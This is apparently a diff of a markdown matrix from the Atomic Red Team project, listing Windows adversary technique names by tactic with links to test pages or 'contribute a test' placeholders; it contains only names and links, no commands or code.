-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
-| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Office Test](../../T1137.002/T1137.002.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
-| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
-| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
-| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
-| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
-| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
-| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
-| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
-| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
-| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
-| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
-| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
-| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
-| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
-| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Windows Service](../../T1543.003/T1543.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
